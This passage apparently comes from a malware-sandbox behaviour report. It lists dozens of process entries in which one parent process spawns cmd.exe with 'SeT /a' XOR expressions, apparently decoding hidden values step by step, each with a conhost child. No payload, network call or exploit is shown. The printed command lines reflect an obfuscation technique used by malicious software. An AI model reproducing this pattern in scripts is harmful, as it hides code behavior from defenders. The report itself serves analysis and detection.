Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3380, Parent PID: 2660

General

Target ID:	63
Start time:	11:32:22
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09697965^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5928, Parent PID: 3380

General

Target ID:	64
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3976, Parent PID: 2660

General

Target ID:	65
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x5079653D^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 4852, Parent PID: 3976

General

Target ID:	66
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 2592, Parent PID: 2660

General

Target ID:	67
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x0D697C35^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3280, Parent PID: 2592

General

Target ID:	68
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6172, Parent PID: 2660

General

Target ID:	69
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x172B6478^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5300, Parent PID: 6172

General

Target ID:	70
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7616, Parent PID: 2660

General

Target ID:	71
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x721C070B^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5740, Parent PID: 7616

General

Target ID:	72
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4728, Parent PID: 2660

General

Target ID:	73
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x7C156677^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 2836, Parent PID: 4728

General

Target ID:	74
Start time:	11:32:23
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 1272, Parent PID: 2660

General

Target ID:	75
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x03630620^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 8188, Parent PID: 1272

General

Target ID:	76
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6360, Parent PID: 2660

General

Target ID:	77
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3008, Parent PID: 6360

General

Target ID:	78
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 5828, Parent PID: 2660

General

Target ID:	79
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6408, Parent PID: 5828

General

Target ID:	80
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 368, Parent PID: 2660

General

Target ID:	81
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x572D3037^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 4964, Parent PID: 368

General

Target ID:	82
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7364, Parent PID: 2660

General

Target ID:	83
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x11307537^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6888, Parent PID: 7364

General

Target ID:	84
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7420, Parent PID: 2660

General

Target ID:	85
Start time:	11:32:24
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x0C75752C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7384, Parent PID: 7420

General

Target ID:	86
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3440, Parent PID: 2660

General

Target ID:	87
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x19686375^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 1436, Parent PID: 3440

General

Target ID:	88
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 5720, Parent PID: 2660

General

Target ID:	89
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09697569^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5044, Parent PID: 5720

General

Target ID:	90
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6808, Parent PID: 2660

General

Target ID:	91
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x19307575^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5688, Parent PID: 6808

General

Target ID:	92
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3524, Parent PID: 2660

General

Target ID:	93
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x15307575^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5708, Parent PID: 3524

General

Target ID:	94
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3292, Parent PID: 2660

General

Target ID:	95
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x10307B37^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3060, Parent PID: 3292

General

Target ID:	96
Start time:	11:32:25
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6252, Parent PID: 2660

General

Target ID:	97
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x0A64721C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5228, Parent PID: 6252

General

Target ID:	98
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6952, Parent PID: 2660

General

Target ID:	99
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x721C070B^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3172, Parent PID: 6952

General

Target ID:	100
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3016, Parent PID: 2660

General

Target ID:	101
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x7C156677^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 1512, Parent PID: 3016

General

Target ID:	102
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 4636, Parent PID: 2660

General

Target ID:	103
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x03630720^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5404, Parent PID: 4636

General

Target ID:	104
Start time:	11:32:26
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7588, Parent PID: 2660

General

Target ID:	105
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x583D132C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 580, Parent PID: 7588

General

Target ID:	106
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6120, Parent PID: 2660

General

Target ID:	107
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x553C7D2C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 6960, Parent PID: 6120

General

Target ID:	108
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 2644, Parent PID: 2660

General

Target ID:	109
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x4B6C7965^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7780, Parent PID: 2644

General

Target ID:	110
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6360, Parent PID: 2660

General

Target ID:	111
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x50792774^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 420, Parent PID: 6360

General

Target ID:	112
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 5828, Parent PID: 2660

General

Target ID:	113
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x15793C65^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5788, Parent PID: 5828

General

Target ID:	114
Start time:	11:32:27
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 424, Parent PID: 2660

General

Target ID:	115
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09216475^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7412, Parent PID: 424

General

Target ID:	116
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 6888, Parent PID: 2660

General

Target ID:	117
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x09696575^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7364, Parent PID: 6888

General

Target ID:	118
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 7384, Parent PID: 2660

General

Target ID:	119
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x15733C65^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7420, Parent PID: 7384

General

Target ID:	120
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 1436, Parent PID: 2660

General

Target ID:	121
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x0975752C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3440, Parent PID: 1436

General

Target ID:	122
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 5044, Parent PID: 2660

General

Target ID:	123
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x19697C2C^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 5720, Parent PID: 5044

General

Target ID:	124
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 5688, Parent PID: 2660

General

Target ID:	125
Start time:	11:32:28
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x172B6678^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 7472, Parent PID: 5688

General

Target ID:	126
Start time:	11:32:29
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3524, Parent PID: 2660

General

Target ID:	127
Start time:	11:32:29
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x4C2A3037^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3380, Parent PID: 3524

General

Target ID:	128
Start time:	11:32:29
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: cmd.eXePID: 3060, Parent PID: 2660

General

Target ID:	129
Start time:	11:32:29
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\cmd.eXe
Wow64 process (32bit):
Commandline:	cmd.eXe /c SeT /a "0x0A6B6F7F^962155845"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
